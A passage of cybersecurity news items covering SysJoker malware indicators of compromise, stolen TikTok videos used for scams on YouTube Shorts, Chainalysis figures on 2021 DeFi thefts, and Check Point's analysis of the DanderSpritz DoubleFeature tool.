After then, the virus waits for up to two minutes before establishing a new directory and cloning itself as an Intel Graphics Common User Interface Service ("igfxCUIService.exe"). “Next, SysJoker will gather information about the machine using Living off the Land (LOtL) commands. SysJoker uses different temporary text files to log the results of the commands,” explains Intezer’s report. "These text files are deleted immediately, stored in a JSON object and then encoded and written to a file named “microsoft_Windows.dll”.” 

The report includes detailed indicators of compromise (IOCs) that administrators can use to detect the presence of SysJoker on an infected device. 

On Windows, the malware files are located under the "C:\ProgramData\RecoverySystem" folder, at C:\ProgramData\SystemData\igfxCUIService.exe, and C:\ProgramData\SystemData\microsoft_Windows.dll. On Linux, the files and directories are created under “/.Library/” while persistence is established by creating the following cron job: @reboot (/.Library/SystemServices/updateSystem). On macOS, the files are created on "/Library/” and persistence is achieved via LaunchAgent under the path: /Library/LaunchAgents/com.apple.update.plist.

Stolen TikTok Videos have Infiltrated YouTube Shorts

 

Scammers are taking full advantage of the debut of Google's new TikTok competitor, YouTube Shorts, which has proven to be an excellent platform for feeding stolen content to billions of engaged viewers. Researchers have cautioned that this content is being exploited to conduct rackets such as advertising adult dating websites, hustling diet pills, and selling marked-up commodities. Although YouTube Shorts is still in beta, scammers have had plenty of time to shift their best TikTok-tested flimflams over to the Google cosmos, which is already populated by billions of viewers. 

Satnam Narang, a Tenable analyst, has been analyzing social media for over a decade and discovered that scammers are having great success stealing TikTok's most viral videos and exploiting them on YouTube Shorts to get viewers to click on a variety of sites and links. Narang examined 50 distinct YouTube channels and discovered that, as of December, they had accumulated 3.2 billion views across at least 38,293 videos stolen from TikTok creators. He stated that the YouTube channels had over 3 million subscribers. 

The most common type of fraud Narang discovered was the use of extremely popular TikTok videos, especially challenges showing gorgeous women, to serve links to adult dating sites that run affiliate programmes that pay for clicks.

These websites pay affiliates on a cost per action (CPA) or cost per lead (CPL) basis to incentivize them. Scammers, on the other hand, have started taking advantage of these affiliate offers to gain cash by duping users of social media networks. Scammers only need to persuade consumers to visit these adult dating websites and sign up with an email address, whether valid or not. When a visitor to an adult dating website becomes a registered user, the fraudster is able to get anywhere from $2–$4 for the successful CPL conversion. 

“While adult-dating scams proliferate across many platforms, the introduction of YouTube Shorts, with its enormous potential reach and built-in audience, is fertile ground that will only serve to help these scams become even more widespread,” Narang explained. “This trend is alarming because of how successful these tactics have become so quickly on YouTube Shorts, based on the volume of video views and subscribers on these fake channels promoting stolen content.” 

Viewers of YouTube Shorts were also offered advertisements with viral TikTok exercise videos for trending products, such as the pants dubbed "the leggings" on social media. The famous leggings, with a seam across the back to improve even the flattest posterior, were being offered on YouTube Shorts at a markup by scammers expecting the new breed of customers wouldn't notice the padded price, Narang discovered.

According to Chainalysis, Around $2.2 Billion was Stolen from DeFi Protocols in 2021

 

Chainalysis, a blockchain data platform, has issued a new report on cryptocurrency crime patterns, revealing that $14 billion in cryptocurrency was sent to unlawful addresses in 2021, nearly doubling the level observed in 2020. However, those figures do not tell the entire story. 

The use of cryptocurrencies is increasing quicker than ever before. Total transaction volume across all cryptocurrencies tracked by Chainalysis increased to $15.8 trillion in 2021, up 567% from totals in 2020. It's no surprise that more fraudsters are utilising cryptocurrency, given its rapid adoption. 

According to Chainalysis data, around $2.2 billion was directly stolen from DeFi protocols in 2021. Chainalysis projected that illegitimate addresses presently possess at least $10 billion in cryptocurrency as of 2022, with the majority owned by wallets involved in cryptocurrency theft, darknet markets, and frauds.  

Researchers at Chainalysis discovered that cybercriminals made 82% more money via scamming last year, raking in $7.8 billion in cryptocurrencies from victims. Chainalysis uncovered $2.8 billion from a scam known as "rug pulls" among the $7.8 billion. Developers in these scams construct seemingly genuine cryptocurrency ventures before stealing investor funds and disappearing. 

"We believe rug pulls are common in DeFi for two related reasons. One is the hype around the space. DeFi transaction volume grew 912% in 2021, and the incredible returns on decentralized tokens like Shiba Inu have many excited to speculate on DeFi tokens," Chainalysis said. "At the same time, it's very easy for those with the right technical skills to create new DeFi tokens and get them listed on exchanges, even without a code audit. Many investors could likely have avoided losing funds to rug pulls if they'd stuck to DeFi projects that have undergone a code audit – or if DEXes required code audits before listing tokens." 

Many of the high-profile attacks on DeFi exchanges in the previous year, according to Chainalysis, "may be linked back to errors in the smart contract code governing those protocols, which hackers exploit to steal funds." 

The end-of-year attack on DeFi protocol Grim Finance rounded off a tumultuous year for DeFi hacks. More than $77 million was stolen from AscendEX a week before the attack on Grim Finance. A few days before, the blockchain gaming startup Vulcan Forged said that over $140 million had been stolen from their users. 

Cybercriminals stole over $120 million from the DeFi platform Badger in November. Other 2021 incidents include the theft of about $600 million from Poly in August and $34 million from Cream Finance in September. Around $200 million was taken from the PancakeBunny platform in May.

Experts Detail Logging Tool of DanderSpritz Framework Used by Equation Group Hackers

 

Researchers have provided a detailed look at a system called DoubleFeature, which is dedicated to logging the various stages of post-exploitation resulting from the Equation Group's deployment of DanderSpritz, a full-featured malware architecture. 

DanderSpritz was discovered on April 14, 2017, when a hacker group known as the Shadow Brokers published a report titled "Lost in Translation" that included the exploit tool and others. EternalBlue, a cyberattack exploit created by the US National Security Agency (NSA) that allowed threat actors to carry out the NotPetya ransomware attack on unpatched Windows PCs, was also included in the leaks. 

The tool is a modular, covert, and fully functioning framework for post-exploitation activities on Windows and Linux that depends on dozens of plugins. One of them is DoubleFeature, which serves as a "diagnostic tool for victim machines carrying DanderSpritz," according to Check Point researchers in a new paper released Monday. 

The Israeli cybersecurity firm added, "DoubleFeature could be used as a sort of Rosetta Stone for better understanding DanderSpritz modules, and systems compromised by them. It's an incident response team's pipe dream." 

DoubleFeature is a Python-based dashboard that doubles as a reporting utility to exfiltrate logging information from an infected system to an attacker-controlled server. It's designed to keep track of the types of tools that could be deployed on a target machine. A specific executable named "DoubleFeatureReader.exe" is used to interpret the output. 

Data Breach Prevention 

Some of the plugins monitored by DoubleFeature include remote access tools called UnitedRake (aka EquationDrug) and PeddleCheap, a stealthy data exfiltration backdoor dubbed StraitBizarre, an espionage platform called KillSuit (aka GrayFish), a persistence toolset named DiveBar, a covert network access driver called FlewAvenue, and a validator implant named MistyVeal that verifies if the compromised system is indeed an authentic victim machine and not a research environment. 

The researchers stated, "Sometimes, the world of high-tier APT tools and the world of ordinary malware can seem like two parallel universes." 

"Nation-state actors tend to [maintain] clandestine, gigantic codebases, sporting a huge gamut of features that have been cultivated over decades due to practical need. It turns out we too are still slowly chewing on the 4-year-old leak that revealed DanderSpritz to us, and gaining new insights."